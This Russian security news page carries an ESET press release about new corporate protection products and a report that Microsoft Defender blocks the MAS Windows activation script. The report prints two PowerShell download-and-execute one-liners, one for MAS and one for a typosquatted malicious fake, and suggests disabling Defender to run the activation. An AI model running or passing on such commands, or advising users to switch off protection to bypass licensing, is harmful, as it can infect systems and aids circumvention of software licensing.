ESET представил новое поколение корпоративных продуктов

ESET представил новое поколение корпоративных продуктов

ESET представил новое поколение корпоративных продуктов

ESET представляет в России новое поколение продуктов для защиты малых и средних компаний и управления безопасностью корпораций. В линейке представлены обновленные продукты для рабочих станций и серверов, а также абсолютно новое решение для защиты от ранее неизвестных угроз, включая программы-шифраторы.

Согласно отчету исследовательской компании Forrester, заказчикам необходимо «комплексное решение для защиты конечных точек, которое бы имело обширный набор функций и минимизировало сложность процессов». Новая линейка бизнес-продуктов ESET отвечает данным требованиям и обладает дополнительными преимуществами.

Главная новинка продуктовой линейки – встроенная песочница на основе технологий машинного обучения ESET Dynamic Threat Defense. Решение создает дополнительный уровень защиты в продуктах для рабочих станций и почтовых серверов. Пользователь ESET Endpoint Security и ESET Mail Security может автоматически или вручную отправлять для анализа файлы и сообщения электронной почты и получать отчеты о поведении образцов. Детектирование на основе анализа поведения позволяет распознавать угрозы нулевого дня и шифраторы до того, как они проникнут в корпоративную сеть.  

В центре линейки – полнофункциональное средство для централизованного управления безопасностью ESET Security Management Center – новая версия веб-консоли ESET Remote Administrator. Решение обеспечивает полный обзор продуктов безопасности ESET, включая ESET Dynamic Threat Defense. Более того, с его помощью администратор может настраивать групповые политики безопасности, отчеты и уведомления, устранять угрозы в один клик, консолидировать информацию об оборудовании и программном обеспечении, развернутом в сети.

В новом поколении корпоративных продуктов внедрен модуль «Защита от программ-вымогателей», который оценивает и контролирует процессы и приложения с помощью поведенческого анализа и репутационной эвристики. В случае обнаружения подозрительных действий, характерных для программ-вымогателей, пользователю будет предложено заблокировать данную активность.

Новый «Сканер UEFI» следит за целостностью прошивки и обнаруживает попытки модификации. Функция предназначена для обеспечения безопасности среды предварительной загрузки, соответствующей спецификации UEFI.

Улучшенная «Защита от ботнетов» позволяет отслеживать сетевую активность и обнаруживать вредоносные программы путем анализа сетевых коммуникационных моделей и протоколов.

«Корпоративным клиентам нужны решения для безопасности, отвечающие определенным потребностям, – комментирует Юрай Малко, технический директор ESET. – Мы понимаем нужды корпоративного сектора, поскольку сотрудничаем с множеством организаций по всему миру. Новое поколение бизнес-продуктов максимально упрощает процессы управления и легко интегрируется в корпоративную сеть любой сложности».

Более подробная информация о новом поколении корпоративных продуктов доступна по ссылке.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru